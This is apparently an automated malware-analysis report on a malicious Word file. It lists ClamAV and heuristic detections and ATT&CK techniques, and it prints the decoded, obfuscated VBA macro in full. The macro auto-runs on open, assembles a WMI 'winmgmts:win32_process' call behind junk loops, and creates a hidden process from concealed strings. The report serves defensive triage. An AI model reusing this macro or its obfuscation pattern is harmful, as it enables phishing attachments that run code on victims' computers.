MALICIOUS
172
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is a malicious Office document containing VBA macros. The 'Document_open' macro is configured to execute, and heuristics indicate a 'GetObject' call and p-code auto-execution, suggesting an attempt to run malicious code. The ClamAV detection as 'Doc.Downloader.Generic' further supports that this macro is intended to download and execute a second-stage payload. No specific family could be identified due to heavy obfuscation in the script.
Heuristics 7
-
ClamAV: Doc.Downloader.Generic-7542831-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7542831-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Loop Set Nujxkvorwdr = GetObject(Zzpjrlzqf) Do While Ttkezqms = 999 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() Zuavzvtcbh -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11723 bytes |
SHA-256: 59fde5abedccdff9a091c0dc2ff02f4261017b3a5913b86ec0330c6ad187c9a8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
230 of 339 identifiers look randomly generated (e.g. 'roc9_msnnj883hn') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Xywjsyfyvjrci"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Zuavzvtcbh
End Sub
Attribute VB_Name = "Arqpynjunexpj"
Attribute VB_Base = "0{946D3CF8-BEC8-4DAA-9140-8C48411EFFD0}{B768260D-E8DD-4A84-81A9-9CACDCFAF149}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Jwcmxsvuwe"
Function Zjryuyjsoo()
Do While Dmimsioyflj = 999
Do While Zrvqigqmie = 67 + 344
Jufqmvyws = CLng(Qrwripojdum)
Bxuvpevhjg = Int(9116 + 44)
Jhsqkqqjbey = CDate(QKoWc)
Ixuuvlwvupp = 1279 + Int(546)
Gouigkod = Chr(4806)
Vtsewoixy = Sqr(1512) + Hhbnovlso
Loop
Do While Phjcptxo = 33 + 5
Ipyachagms = 234 + Int(34)
Xygsuspclkps = Chr(44)
Uuzozkkuyr = Sqr(55) + Mollbanwkl
Yfyuaxzgwrmfh = CLng(Ficzpqigbrzj)
Iajzcptlq = Int(23 + 4)
Swpubfee = CDate(QKoWc)
Loop
Loop
Zerperwzhmpn = ChrW(wdKeyP)
Do While Mpzqhamviak = 999
Do While Ljjcfpwmcfqi = 67 + 344
Lrochrkaungg = CLng(Kbctvftd)
Aqhckjiic = Int(9116 + 44)
Etxdgilp = CDate(QKoWc)
Yrscadxnzzisj = 1279 + Int(546)
Jhpkeyeqdgi = Chr(4806)
Pxincjbypaj = Sqr(1512) + Udhslkvmwb
Loop
Do While Rxubpwszg = 33 + 5
Ruqzaruh = 234 + Int(34)
Sdbjkuyi = Chr(44)
Vmhklgxadrhe = Sqr(55) + Qxvkuvbt
Yutsebtq = CLng(Genfottud)
Ogzsmzonirbxf = Int(23 + 4)
Nfvbxqbsulkp = CDate(QKoWc)
Loop
Loop
Vcnuzhdnf = Zerperwzhmpn + Arqpynjunexpj.Izmqggskl + Arqpynjunexpj.Mmbmdjbkay
Do While Itsmhvdyrh = 999
Do While Caosstbxlyd = 67 + 344
Onffwrcvt = CLng(Ghfmlljq)
Ppfuyubwzkpog = Int(9116 + 44)
Xtvpfujgm = CDate(QKoWc)
Opmzonmizy = 1279 + Int(546)
Ywbztjmrbm = Chr(4806)
Soaldfjshng = Sqr(1512) + Zvccytkwiw
Loop
Do While Upxzuibky = 33 + 5
Naetphck = 234 + Int(34)
Punjodstqjr = Chr(44)
Jplsnffbl = Sqr(55) + Pcuavpflcqfv
Ffirhxjgtud = CLng(Pflndcsuljr)
Efeqdtbc = Int(23 + 4)
Wkeuljjzxrapg = CDate(QKoWc)
Loop
Loop
Fack = Arqpynjunexpj.Mnrsmdweu.Tag
Avgdnxbxgx = Split(Vcnuzhdnf + LTrim(LTrim(Fack)), "9_msnnj883hn///")
Do While Kbgydubgqm = 999
Do While Loynyuvqjgsxd = 67 + 344
Teyinxsobgmi = CLng(Putxgcaqvt)
Mzeiiujbicsdt = Int(9116 + 44)
Zxhlmyfumyzx = CDate(QKoWc)
Ciexoltksxsy = 1279 + Int(546)
Nbpefkbs = Chr(4806)
Yagfrkjxt = Sqr(1512) + Togfpzoej
Loop
Do While Cehlivrgrju = 33 + 5
Neotioufnvtnj = 234 + Int(34)
Lmoeolycxgb = Chr(44)
Mqwzrhrkk = Sqr(55) + Vyhoinyzwbufv
Npcqnhaps = CLng(Uvchfassiqdjt)
Crdrlajjt = Int(23 + 4)
Uhovipris = CDate(QKoWc)
Loop
Loop
Zjryuyjsoo = Abjmmlun + Join(Avgdnxbxgx, "") + Abjmmlun
Do While Lzlajort = 999
Do While Vzihnfbzci = 67 + 344
Ksjyxoxawucs = CLng(Dxekinwuraall)
Rfmvtpsrkrdvh = Int(9116 + 44)
Xpirbdvs = CDate(QKoWc)
Uqaiylcsdfop = 1279 + Int(546)
Hkfutfsoh = Chr(4806)
Kcudtwnm = Sqr(1512) + Ysjmgacehmhsd
Loop
Do While Ybzuzgjkeoi = 33 + 5
Jibdthisvhm = 234 + Int(34)
Kadvrzkmuvn = Chr(44)
Sohexxsnu = Sqr(55) + Dzwbyctmpj
Hiwixcomnm = CLng(Ukrkombpbrr)
Ioscbbvw = Int(23 + 4)
Vboukfmx = CDate(QKoWc)
Loop
Loop
End Function
Function Zuavzvtcbh()
wen = "i9_msnnj883hn///9_msnnj883hn///n9_msnnj883hn///9_msnnj883hn///mg9_msnnj883hn///9_msnnj883hn///mt9_msnnj883hn///" + ChrW(wdKeyS) + ":win32_" + Arqpynjunexpj.Gulztqhtg + "9_msnnj883hn///roc9_msnnj883hn///9_msnnj883hn///es9_msnnj883hn///9_msnnj883hn///s"
Do While Qmuanjsmgi = 999
Do While Tgoxsfqnxzsh = 67 + 344
Cvpmcfxmgx = CLng(Flylcesxxcxgj)
Dprumgchx = Int(9116 + 44)
Gquhaqbwzepm = CDate(QKoWc)
Pvnaxidqxux = 1279 + Int(546)
Jpceaoiy = Chr(4806)
Pbhenldo = Sqr(1512) + Gxlohzoqptzj
Loop
Do While Sgxaoxopnsx = 33 + 5
Eqftguvvlen = 234 + Int(34)
Zsiidgqt = Chr(44)
Odzffrjsr = Sqr(55) + Kakatoprgb
Nxwgfoqh = CLng(Jqqgppeclwor)
Yhjsbcfffalh = Int(23 + 4)
Deabmsqujm = CDate(QKoWc)
Loop
Loop
ski = "9_msnnj883hn///"
Do While Shuqmrpvefeg = 999
Do While Hbiyocxgsyqm = 67 + 344
Qpkftaoawletn = CLng(Byyjrgrvivyu)
Waayrepuznv = Int(9116 + 44)
Fwuupolqz = CDate(QKoWc)
Bqztcjug = 1279 + Int(546)
Aldvveghzl = Chr(4806)
Alyoaifayx = Sqr(1512) + Wafvspspcuekq
Loop
Do While Kejzfopqnuoi = 33 + 5
Cnddgyvy = 234 + Int(34)
Ktzjfgnxapv = Chr(44)
Xcihjsadggo = Sqr(55) + Bhkbyluup
Flggrhwehzf = CLng(Rlgjldnkkyfgm)
Jbtiptbymum = Int(23 + 4)
Jshwhnjmfk = CDate(QKoWc)
Loop
Loop
Iqtabmqfgunu = Split("9_msnnj883hn///9_msnnj883hn///9_msnnj883hn///w" + wen, ski)
Do While Qicqvfswz = 999
Do While Jcqssdxcxwfa = 67 + 344
Jycyuqvsxfjy = CLng(Vyswhafikqdms)
Kkibwmgpyeb = Int(9116 + 44)
Elitpahyditb = CDate(QKoWc)
Omuiyxdn = 1279 + Int(546)
Xrkojurf = Chr(4806)
Dyhkwrqpgbp = Sqr(1512) + Kscewdanrq
Loop
Do While Xpsoirnzzyqfk = 33 + 5
Hngtmwiaw = 234 + Int(34)
Ucbamhanyby = Chr(44)
Kbajmcxtlwtak = Sqr(55) + Appvhswlyyli
Mejniilvynujw = CLng(Iabjfnjmc)
Nqclattwz = Int(23 + 4)
Nbojeqbayv = CDate(QKoWc)
Loop
Loop
Zzpjrlzqf = Join(Iqtabmqfgunu, "")
Do While Hypvcmnw = 999
Do While Aessllqztexe = 67 + 344
Rulhpexr = CLng(Ucvmbmgy)
Asndccxvaw = Int(9116 + 44)
Tmeibfhn = CDate(QKoWc)
Uqxiqexhxz = 1279 + Int(546)
Cyghfngbqnxr = Chr(4806)
Htlareoqy = Sqr(1512) + Tltytzerb
Loop
Do While Btauhvsgs = 33 + 5
Iwdvxhgdlzjbm = 234 + Int(34)
Dxotahybssa = Chr(44)
Tysebtdwuxbwk = Sqr(55) + Gssnstruryerj
Dwkjknhezs = CLng(Iamwqkyvazm)
Bdafwctc = Int(23 + 4)
Fmbmmznsvvci = CDate(QKoWc)
Loop
Loop
Set Nujxkvorwdr = GetObject(Zzpjrlzqf)
Do While Ttkezqms = 999
Do While Uylklkbasd = 67 + 344
Obhrwkvdixln = CLng(Oyzgfeqghmk)
Ljaxiuafjw = Int(9116 + 44)
Cxibwnxevvda = CDate(QKoWc)
Echtvhmbjuhac = 1279 + Int(546)
Kebsldhhf = Chr(4806)
Nenpfzkkqyxpb = Sqr(1512) + Anotvkezl
Loop
Do While Iauxuciv = 33 + 5
Otohpscgm = 234 + Int(34)
Secttlpoifcyd = Chr(44)
Qsdvgffzmt = Sqr(55) + Gsbsybcqwr
Qthldlvk = CLng(Bjdritnfq)
Zjvgmexbanzp = Int(23 + 4)
Nytwaypva = CDate(QKoWc)
Loop
Loop
Arqobwwfdy = Zzpjrlzqf + ChrW(wdKeyS) + Arqpynjunexpj.Alojhpccrujkt.ControlTipText$ + Arqpynjunexpj.Bsffnmveyv.ControlTipText
Do While Rifdxbyzbqqhd = 999
Do While Nnmlpcdg = 67 + 344
Ihnlljqguf = CLng(Enafmzpa)
Lnfirwrwo = Int(9116 + 44)
Tptlnpgabj = CDate(QKoWc)
Jjzlkpeqwxbwa = 1279 + Int(546)
Suoyrdul = Chr(4806)
Tyjizlxjo = Sqr(1512) + Skhhklmvnwkhm
Loop
Do While Mlkvpxaeq = 33 + 5
Hwmenmkdzjhq = 234 + Int(34)
Iqljjrwutzmy = Chr(44)
Bsfqqpepi = Sqr(55) + Ywjpweuddh
Vhzyndmspte = CLng(Dqasnshca)
Nexurupztckj = Int(23 + 4)
Qmwqufsgisn = CDate(QKoWc)
Loop
Loop
Jcagkmzbinuo = Arqobwwfdy + Arqpynjunexpj.Gulztqhtg
Do While Vxpzgufeoite = 999
Do While Ygbfnawlzv = 67 + 344
Onwsjowlpmdj = CLng(Jmnwsxjpn)
Jacykxtumfsh = Int(9116 + 44)
Ehpwldrxgrjxd = CDate(QKoWc)
Kyzyzznun = 1279 + Int(546)
Kpvbqerwopt = Chr(4806)
Ucmukomu = Sqr(1512) + Bhsiwaqnbr
Loop
Do While Bbeafghosqfx = 33 + 5
Nsjzsvtduuywu = 234 + Int(34)
Brcfbakqjjgmb = Chr(44)
Buezmxdcyb = Sqr(55) + Hkcilkqqzdsbw
Zqmirjjs = CLng(Vjaxpeeccdgh)
Bldlxbccjudm = Int(23 + 4)
Hpxrxrpbpsjz = CDate(QKoWc)
Loop
Loop
Set Zuavzvtcbh = GetObject(Jcagkmzbinuo)
Do While Xzudgsofi = 999
Do While Murlabordpi = 67 + 344
Pczgsnibqbj = CLng(Dootcdfwic)
Kicqeqos = Int(9116 + 44)
Dshnurlwshi = CDate(QKoWc)
Acjnfbuhzudhf = 1279 + Int(546)
Llukfplwlo = Chr(4806)
Llkxvtkcovd = Sqr(1512) + Ihdyefolakg
Loop
Do While Mipfyywojvpwi = 33 + 5
Cwqiktwihygj = 234 + Int(34)
Kadkxhcn = Chr(44)
Fndzmobwrujdu = Sqr(55) + Epahhrob
Ulmkhsootdxqx = CLng(Wksashgfisrc)
Fqlqarcp = Int(23 + 4)
Buobveosdo = CDate(QKoWc)
Loop
Loop
Zuavzvtcbh. _
showwindow = False
Do While Rrclpfytkq = 999
Do While Ziubkgeuu = 67 + 344
Pqkfzeidaqjir = CLng(Xksxpynvegf)
Yjssqtnufz = Int(9116 + 44)
Bnfppzdivit = CDate(QKoWc)
Mzbufytmxeryr = 1279 + Int(546)
Fuslthnlhgphb = Chr(4806)
Qpqvdtlazag = Sqr(1512) + Ioqyhgcap
Loop
Do While Pzounqrrd = 33 + 5
Bhwoduuskmf = 234 + Int(34)
Spqzvgoa = Chr(44)
Fefqmjjoy = Sqr(55) + Micscigxyvjq
Yzrvxsnv = CLng(Jydhiayhlhf)
Htxidinwoto = Int(23 + 4)
Staehrjlje = CDate(QKoWc)
Loop
Loop
Do While Nujxkvorwdr.Create(pok & Zjryuyjsoo, Wsdstgndcmu, Zuavzvtcbh, Fdftuszp)
Loop
Do While Anhndkzl = 999
Do While Dczwxzlkkco = 67 + 344
Ssabcqajs = CLng(Nfnkaxuybwe)
Gxbbfmtmfipvc = Int(9116 + 44)
Ukhlskislakmh = CDate(QKoWc)
Iotduepzdfpc = 1279 + Int(546)
Yoxoxdrpsglyf = Chr(4806)
Vzmvkzac = Sqr(1512) + Tekdfciavnl
Loop
Do While Kmdtvnswyayhg = 33 + 5
Xxxmyaezg = 234 + Int(34)
Ddxkbojbcih = Chr(44)
Ogruemvzz = Sqr(55) + Ypznyfnw
Joyoyjyeb = CLng(Rsxrijvtpod)
Mlpvdwukxxfr = Int(23 + 4)
Fcxuxdmgx = CDate(QKoWc)
Loop
Loop
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.